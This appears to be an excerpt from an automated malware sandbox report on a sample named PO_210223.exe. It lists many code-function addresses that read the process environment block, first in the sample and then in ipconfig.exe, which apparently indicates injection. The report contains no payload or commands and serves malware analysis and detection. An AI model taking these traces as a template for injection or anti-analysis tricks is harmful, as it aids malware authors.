            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018490AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018058EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01820050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01820050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01811B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01811B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01818A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01823A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01894257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018335A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018B8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0188A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01843D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01883540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01827D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01818794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018437F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018846A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01848EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018336CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018316E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018176E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01838E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0351131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]
